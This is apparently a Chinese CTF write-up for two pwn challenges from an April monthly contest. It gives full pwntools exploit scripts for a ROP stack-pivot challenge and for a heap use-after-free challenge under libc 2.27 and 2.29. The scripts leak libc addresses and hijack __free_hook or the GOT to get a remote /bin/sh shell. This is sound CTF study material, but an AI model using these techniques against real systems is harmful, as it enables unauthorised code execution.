安恒四月举办的一次月赛,赵师傅说是雨露均沾,应该算是吧
Test
花了点时间把ROP这个题补上,当时没做,把Taqini师傅的WP看了一下,草草的把exp补上了,exp最后是把栈迁移到了bss段上,以及用了ret令rsp对齐0x10
MAIN LIBC:2.27 EXP
1 | from pwn import* |
2 | context.log_level ='DEBUG' |
3 | p = process('./main') |
4 | p = remote('183.129.189.60',10039) |
5 | elf =ELF('./main') |
6 | libc =ELF('./libc-2.27.so') |
7 | pop_rdi_ret = 0x400823 |
8 | ret = 0x40055E |
9 | p.sendlineafter('name: ',str(0x100)) |
10 | payload ='\x00'*0x80 + p64(elf.bss() + 0x800) + p64(pop_rdi_ret) + p64(elf.got['read']) + p64(0x4006F3) |
11 | p.sendafter('name?',payload) |
12 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['read'] |
13 | system = libc_base + libc.sym['system'] |
14 | binsh = libc_base + libc.search('/bin/sh').next() |
15 | log.info('LIBC:\t' + hex(libc.address)) |
16 | p.sendline(str(0x100)) |
17 | p.sendlineafter('you name?','U'*0x88 + p64(ret) + p64(pop_rdi_ret) + p64(binsh) + p64(system)) |
18 | p.interactive() |
Sales_Office
就三个PWN题,一个简单的rop,两个堆,其实算一个堆吧,只是环境不一样而已,简单的UAF洞,2.29的脚本向前兼容2.27的,只要形成tcache dup或者fastbin dup即可
MAIN LIBC:2.27 EXP
1 | from pwn import* |
2 | def new(size,content): |
3 | p.sendlineafter('choice:','1') |
4 | p.sendlineafter('house:',str(size)) |
5 | p.sendafter('your house:',content) |
6 | def show(index): |
7 | p.sendlineafter('choice:','3') |
8 | p.sendlineafter('index:',str(index)) |
9 | def free(index): |
10 | p.sendlineafter('choice:','4') |
11 | p.sendlineafter('index:',str(index)) |
12 | p = process('./main') |
13 | p = remote('183.129.189.60',10060) |
14 | elf =ELF('./main') |
15 | libc = ELF('./libc-2.27.so',checksec=False) |
16 | new(0x10,'FMYY') #0 |
17 | new(0x10,'FMYY') #1 |
18 | new(0x10,'FMYY') #2 |
19 | new(0x10,'FMYY') #3 |
20 | |
21 | #--------- |
22 | free(2) |
23 | free(0) |
24 | free(0) |
25 | show(0) |
26 | p.recvuntil('house:\n') |
27 | heap_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) - 0x260 |
28 | log.info('HEAP:\t'+ hex(heap_base)) |
29 | new(0x10,p64(heap_base + 0x2A0)) |
30 | new(0x20,'FMYY') |
31 | new(0x10,p64(elf.got['__libc_start_main'])) |
32 | show(1) |
33 | p.recvuntil('house:\n') |
34 | libc_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) - libc.sym['__libc_start_main'] |
35 | log.info('LIBC:\t' + hex(libc_base)) |
36 | free_hook = libc_base + libc.sym['__free_hook'] |
37 | system = libc_base + libc.sym['system'] |
38 | #------------ |
39 | free(3) |
40 | free(3) |
41 | new(0x10,p64(free_hook)) |
42 | new(0x20,'/bin/sh\x00') |
43 | new(0x10,p64(system)) |
44 | free(8) |
45 | p.interactive() |
1 | from pwn import* |
2 | def new(size,content): |
3 | p.sendlineafter('choice:','1') |
4 | p.sendlineafter('house:',str(size)) |
5 | p.sendafter('your house:',content) |
6 | def show(index): |
7 | p.sendlineafter('choice:','3') |
8 | p.sendlineafter('index:',str(index)) |
9 | def free(index): |
10 | p.sendlineafter('choice:','4') |
11 | p.sendlineafter('index:',str(index)) |
12 | p = process('./main') |
13 | p = remote('das.wetolink.com',28499) |
14 | elf =ELF('./main') |
15 | libc = ELF('./libc-2.29.so',checksec=False) |
16 | for i in range(5): |
17 | new(0x10,'/bin/sh\x00') |
18 | for i in range(3,-1,-1): |
19 | free(i) |
20 | new(0x10,p64(elf.got['__libc_start_main'])) |
21 | show(1) |
22 | p.recvuntil('house:\n') |
23 | libc_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) - libc.sym['__libc_start_main'] |
24 | log.info('LIBC:\t' + hex(libc_base)) |
25 | free_hook = libc_base + libc.sym['__free_hook'] |
26 | malloc_hook = libc_base + libc.sym['__malloc_hook'] |
27 | system = libc_base + libc.sym['system'] |
28 | rce = libc_base +0xe2383 |
29 | show(2) |
30 | p.recvuntil('house:\n') |
31 | heap_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) - 0x320 |
32 | log.info('HEAP:\t'+ hex(heap_base)) |
33 | free(4) |
34 | free(5) |
35 | free(0) |
36 | new(0x10,'FMYY') |
37 | new(0x10,'FMYY') |
38 | new(0x10,'FMYY') |
39 | new(0x10,p64(elf.got['atoi'])) |
40 | new(0x60,'FMYY') |
41 | new(0x10,p64(system)) |
42 | p.sendlineafter('choice:','/bin/sh\x00') |
43 | p.interactive() |